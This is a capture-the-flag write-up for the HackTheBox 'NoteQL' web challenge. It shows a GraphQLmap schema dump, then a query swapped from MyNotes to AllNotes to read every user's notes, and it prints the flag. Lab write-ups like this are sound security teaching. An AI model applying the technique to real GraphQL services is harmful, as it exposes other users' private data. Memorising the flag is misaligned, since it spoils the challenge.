Challenge Info
I don't think that replacing your REST APIs means that you don't need access controls. Can you read the admin's tasks from this minimal note taking application?
Solution
The title of this challenge pretty much tells us straight away that we're dealing with GraphQL.
Visiting the website:
I used a tool called GraphQLmap
to get a better understanding of the GraphQL we're dealing with.
┌─[s1gh@fsociety]─[~/Documents/HackTheBox/HTB-Business-CTF-2021/Web/NoteQL/GraphQLmap]
└──╼ $ python3 graphqlmap.py -u http://165.227.225.92:32634/graphql
_____ _ ____ _
/ ____| | | / __ \| |
| | __ _ __ __ _ _ __ | |__ | | | | | _ __ ___ __ _ _ __
| | |_ | '__/ _` | '_ \| '_ \| | | | | | '_ ` _ \ / _` | '_ \
| |__| | | | (_| | |_) | | | | |__| | |____| | | | | | (_| | |_) |
\_____|_| \__,_| .__/|_| |_|\___\_\______|_| |_| |_|\__,_| .__/
| | | |
|_| |_|
Author: @pentest_swissky Version: 1.0
GraphQLmap > dump_new
============= [SCHEMA] ===============
e.g: name[Type]: arg (Type!)
Query
AllNotes[Post]:
Note[]: id (ID!),
MyNotes[Post]:
NotesFrom[Post]: author (String!),
Post
id[]:
title[]:
author[]:
completed[]:
Mutation
createNote[]: title (String!),
updateNote[]: id (ID!), title (String!), author (String!),
completeNote[]: id (ID!),
deleteNote[]: id (ID!),
__Schema
__Type
__Field
__InputValue
__EnumValue
__Directive
GraphQLmap >
We see a query called AllNotes
- which is quite interesting.
After adding a note and clicking on the recently added note (and sending the request through Burp):
I change MyNotes
to AllNotes
in order the dump every note that's stored in this application.
And here we find the flag!
Flag: HTB{n0b0dy_c0ntr0ls_m3!!}